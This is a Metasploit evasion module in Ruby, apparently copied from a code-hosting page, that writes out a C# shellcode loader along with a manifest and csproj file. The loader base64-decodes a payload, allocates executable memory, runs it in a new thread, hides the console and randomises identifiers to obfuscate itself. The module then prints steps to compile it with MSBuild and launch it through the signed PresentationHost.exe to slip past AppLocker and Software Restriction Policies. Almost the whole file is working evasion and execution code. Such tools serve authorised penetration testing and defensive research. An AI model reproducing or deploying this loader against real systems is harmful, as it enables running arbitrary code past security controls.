Path: blob/master/modules/evasion/windows/applocker_evasion_presentationhost.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Evasion67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Applocker Evasion - Windows Presentation Foundation Host',12'Description' => %q{13This module will assist you in evading Microsoft14Windows Applocker and Software Restriction Policies.15This technique utilises the Microsoft signed binary16PresentationHost.exe to execute user supplied code.17},18'Author' => [19'Nick Tyrer <@NickTyrer>', # module development20'Casey Smith' # presentationhost bypass research21],22'License' => MSF_LICENSE,23'Platform' => 'win',24'Arch' => [ARCH_X86],25'Targets' => [['Microsoft Windows', {}]]26)27)2829register_options(30[31OptString.new('CS_FILE', [true, 'Filename for the .xaml.cs file (default: presentationhost.xaml.cs)', 'presentationhost.xaml.cs']),32OptString.new('MANIFEST_FILE', [true, 'Filename for the .manifest file (default: presentationhost.manifest)', 'presentationhost.manifest']),33OptString.new('CSPROJ_FILE', [true, 'Filename for the .csproj file (default: presentationhost.csproj)', 'presentationhost.csproj'])34]35)3637deregister_options('FILENAME')38end3940def build_payload41Rex::Text.encode_base64(payload.encoded)42end4344def obfu45Rex::Text.rand_text_alpha 846end4748def presentationhost_xaml_cs49esc = build_payload50mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]51<<~HEREDOC52using System;53class #{mod[0]}{54static void Main(string[] args){55IntPtr #{mod[1]};56#{mod[1]} = GetConsoleWindow();57ShowWindow(#{mod[1]}, #{mod[2]});58string #{mod[3]} = "#{esc}";59byte[] #{mod[4]} = Convert.FromBase64String(#{mod[3]});60byte[] #{mod[5]} = #{mod[4]};61IntPtr #{mod[6]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[5]}.Length, #{mod[7]}, #{mod[8]});62System.Runtime.InteropServices.Marshal.Copy(#{mod[5]}, 0, #{mod[6]}, #{mod[5]}.Length);63IntPtr #{mod[9]} = IntPtr.Zero;64WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[6]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[10]});}65private static Int32 #{mod[7]}=0x1000;66private static IntPtr #{mod[8]}=(IntPtr)0x40;67private static UInt32 #{mod[10]} = 0xFFFFFFFF;68[System.Runtime.InteropServices.DllImport("kernel32")]69private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);70[System.Runtime.InteropServices.DllImport("kernel32")]71private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);72[System.Runtime.InteropServices.DllImport("kernel32")]73private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);74[System.Runtime.InteropServices.DllImport("user32.dll")]75static extern bool ShowWindow(IntPtr #{mod[1]}, int nCmdShow);76[System.Runtime.InteropServices.DllImport("Kernel32")]77private static extern IntPtr GetConsoleWindow();78const int #{mod[2]} = 0;}79HEREDOC80end8182def presentationhost_manifest83<<~HEREDOC84<?xml version="1.0" encoding="utf-8"?>85<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">86<assemblyIdentity version="1.0.0.0" name="MyApplication.app" />87<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">88<security>89<applicationRequestMinimum>90<defaultAssemblyRequest permissionSetReference="Custom" />91<PermissionSet class="System.Security.PermissionSet" version="1" ID="Custom" SameSite="site" Unrestricted="true" />92</applicationRequestMinimum>93<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">94<requestedExecutionLevel level="asInvoker" uiAccess="false" />95</requestedPrivileges>96</security>97</trustInfo>98</assembly>99HEREDOC100end101102def presentationhost_csproj103<<~HEREDOC104<?xml version="1.0" encoding="utf-8"?>105<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">106<Import Project="$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')" />107<PropertyGroup>108<Configuration Condition=" '$(Configuration)' == '' ">Release</Configuration>109<Platform Condition=" '$(Platform)' == '' ">x86</Platform>110<OutputType>WinExe</OutputType>111<HostInBrowser>true</HostInBrowser>112<GenerateManifests>true</GenerateManifests>113<SignManifests>false</SignManifests>114</PropertyGroup>115<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">116<Optimize>true</Optimize>117<OutputPath>.</OutputPath>118</PropertyGroup>119<ItemGroup>120<Reference Include="System" />121</ItemGroup>122<ItemGroup>123<Compile Include="#{datastore['CS_FILE']}">124<DependentUpon>#{datastore['CS_FILE']}</DependentUpon>125<SubType>Code</SubType>126</Compile>127</ItemGroup>128<ItemGroup>129<None Include="#{datastore['MANIFEST_FILE']}" />130</ItemGroup>131<Import Project="$(MSBuildToolsPath)\\Microsoft.CSharp.targets" />132</Project>133HEREDOC134end135136def file_format_filename(name = '')137name.empty? ? @fname : @fname = name138end139140def create_files141f1 = datastore['CS_FILE'].empty? ? 'presentationhost.xaml.cs' : datastore['CS_FILE']142f1 << '.xaml.cs' unless f1.downcase.end_with?('.xaml.cs')143f2 = datastore['MANIFEST_FILE'].empty? ? 'presentationhost.manifest' : datastore['MANIFEST_FILE']144f2 << '.manifest' unless f2.downcase.end_with?('.manifest')145f3 = datastore['CSPROJ_FILE'].empty? ? 'presentationhost.csproj' : datastore['CSPROJ_FILE']146f3 << '.csproj' unless f3.downcase.end_with?('.csproj')147cs_file = presentationhost_xaml_cs148manifest_file = presentationhost_manifest149csproj_file = presentationhost_csproj150file_format_filename(f1)151file_create(cs_file)152file_format_filename(f2)153file_create(manifest_file)154file_format_filename(f3)155file_create(csproj_file)156end157158def instructions159print_status "Copy #{datastore['CS_FILE']}, #{datastore['MANIFEST_FILE']} and #{datastore['CSPROJ_FILE']} to the target"160print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['CSPROJ_FILE']}"161print_status "Execute using: C:\\Windows\\System32\\PresentationHost.exe [Full Path To] #{datastore['CS_FILE'].gsub('.xaml.cs', '.xbap')}"162end163164def run165create_files166instructions167end168end169170171